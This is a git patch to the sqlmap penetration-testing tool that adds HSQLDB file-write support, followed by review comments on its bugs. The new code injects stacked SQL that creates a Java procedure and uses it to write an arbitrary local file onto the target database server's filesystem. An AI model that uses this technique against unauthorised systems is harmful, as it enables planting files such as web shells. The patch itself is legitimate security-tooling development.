From babe52eb1087280f1ea9c982abbef374976dffba Mon Sep 17 00:00:00 2001
From: tree-chtsec <68040445+tree-chtsec@users.noreply.github.com>
Date: Tue, 13 Oct 2020 16:56:39 +0800
Subject: [PATCH] HSQLDB write file support (#4379)
* Make asterisk work with --csrf-token option
* add --file-write support in HSQLDB
Co-authored-by: tree
---
 plugins/dbms/hsqldb/filesystem.py | 51 ++++++++++++++++++++++++++++--
 plugins/dbms/hsqldb/fingerprint.py | 10 ++++++
 2 files changed, 58 insertions(+), 3 deletions(-)
diff --git a/plugins/dbms/hsqldb/filesystem.py b/plugins/dbms/hsqldb/filesystem.py
index 162c8e0a5..1f72a0c6e 100644
--- a/plugins/dbms/hsqldb/filesystem.py
+++ b/plugins/dbms/hsqldb/filesystem.py
@@ -5,6 +5,12 @@ Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
+from lib.core.common import randomStr
+from lib.core.data import kb
+from lib.core.data import logger
+from lib.core.decorators import stackedmethod
+from lib.core.enums import PLACE
+from lib.request import inject
 from lib.core.exception import SqlmapUnsupportedFeatureException
 from plugins.generic.filesystem import Filesystem as GenericFilesystem
@@ -13,6 +19,45 @@ class Filesystem(GenericFilesystem):
 errMsg = "on HSQLDB it is not possible to read files"
 raise SqlmapUnsupportedFeatureException(errMsg)
- def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
- errMsg = "on HSQLDB it is not possible to write files"
- raise SqlmapUnsupportedFeatureException(errMsg)
+ @stackedmethod
+ def stackedWriteFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
+
+ funcName = randomStr()
+ MAX_BYTES = 2 ** 20
+
+ debugMsg = "creating a Java Language Procedure '%s'" % funcName
+ logger.debug(debugMsg)
+
+ addFuncQuery = "CREATE PROCEDURE %s (IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(%s)) " % (funcName, MAX_BYTES)
+ addFuncQuery += "LANGUAGE JAVA DETERMINISTIC NO SQL "
+ addFuncQuery += "EXTERNAL NAME 'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'"
+ inject.goStacked(addFuncQuery)
+
+ logger.debug("encoding file to its hexadecimal string value")
+
+ fcEncodedList = self.fileEncode(localFile, "hex", True)
+ fcEncodedStr = fcEncodedList[0][2:]
+ fcEncodedStrLen = len(fcEncodedStr)
+
+ if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000:
+ warnMsg = "the injection is on a GET parameter and the file "
+ warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen
+ warnMsg += "bytes, this might cause errors in the file "
+ warnMsg += "writing process"
+ logger.warn(warnMsg)
+
+ debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile)
+ logger.debug(debugMsg)
+
+ # http://hsqldb.org/doc/guide/sqlroutines-chapt.html#src_jrt_procedures
+ invokeQuery = "call %s('%s', cast ('%s' AS VARBINARY(%s)))" % (funcName, remoteFile, fcEncodedStr, MAX_BYTES)
+ inject.goStacked(invokeQuery)
+
+ logger.debug("removing procedure %s from DB" % funcName)
+ delQuery = "DELETE PROCEDURE " + funcName
+ inject.goStacked(delQuery)
+
+ message = "the local file '%s' has been successfully written on the back-end DBMS" % localFile
+ message += "file system ('%s')" % remoteFile
+ logger.info(message)
+
diff --git a/plugins/dbms/hsqldb/fingerprint.py b/plugins/dbms/hsqldb/fingerprint.py
index 6641acd21..3b0bfb033 100644
--- a/plugins/dbms/hsqldb/fingerprint.py
+++ b/plugins/dbms/hsqldb/fingerprint.py
@@ -144,3 +144,13 @@ class Fingerprint(GenericFingerprint):
 def getHostname(self):
 warnMsg = "on HSQLDB it is not possible to enumerate the hostname"
 logger.warn(warnMsg)
+
+
+ def checkDbmsOs(self, detailed=False):
+ if Backend.getOs():
+ infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs()
+ logger.info(infoMsg)
+ else:
+ self.userChooseDbmsOs()
+
+
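Review bot: The cleanup near the end of `stackedWriteFile` issues `DELETE PROCEDURE`, which as far as I know is not HSQLDB syntax (routines are removed with `DROP PROCEDURE`), so the randomly named procedure would likely stay behind on the database under assessment; `delQuery = "DROP PROCEDURE " + funcName` looks like the intended statement. The success message is then logged unconditionally: `forceCheck` is never read, nothing is returned, and the local file's size is not compared with `MAX_BYTES` before the `VARBINARY(%s)` cast, so a write that failed would still be reported as successful. The second half of that message also lacks a leading space and renders as "DBMSfile system"; `message += " file system ('%s')" % remoteFile` fixes it.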
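Review bot: `checkDbmsOs` accepts `detailed` but never reads it, and the new method has no docstring saying that it only reports an operating system already recorded in `Backend` and otherwise defers to `userChooseDbmsOs()`. A one-line docstring such as `"""Log the back-end OS if already known, else defer to userChooseDbmsOs(); 'detailed' is ignored."""` would make that explicit. `Backend` is not imported in any visible hunk, so it is presumably already imported at the top of fingerprint.py; worth confirming. The hunk also adds two blank lines before the method inside the class and two trailing blank lines at the end of the file, where PEP 8 expects one and none respectively.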